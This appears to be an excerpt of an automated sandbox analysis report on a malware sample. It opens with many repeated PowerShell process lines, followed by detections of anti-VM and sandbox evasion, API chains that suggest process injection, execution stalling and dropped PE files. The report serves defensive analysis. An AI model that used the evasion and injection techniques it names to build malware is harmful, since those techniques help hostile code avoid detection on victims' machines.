            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2504, type: MEMORYSTR
            Contains functionality to compare user and computer (likely to detect sandboxes)
            Source: C:\Windows\System32\dialer.exeCode function: OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,54_2_00007FF7FB4C10C0
            Found API chain indicative of sandbox detection
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_19-106147
            Found stalling execution ending in API Sleep call
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeStalling execution: Execution stalls by calling Sleepgraph_0-3897
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeMemory allocated: 2600000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeMemory allocated: 2880000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeMemory allocated: 2680000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeMemory allocated: B40000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeMemory allocated: 2630000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeMemory allocated: 4630000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\287175\RegAsm.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Users\user\AppData\Local\Temp\287175\Surrey.pifWindow / User API: threadDelayed 5494Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4391Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5377Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4942
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1208
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6305
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3480
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8254
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1179
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7958
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1472
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6654
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2900
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\tmp11jjwww2.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nfngdkpnjkmg.tmpJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\_bz2.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\_lzma.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\python312.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\python3.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\_bz2.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-file-l2-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-util-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI57242\select.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\Update.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI78962\_lzma.pydJump to dropped file
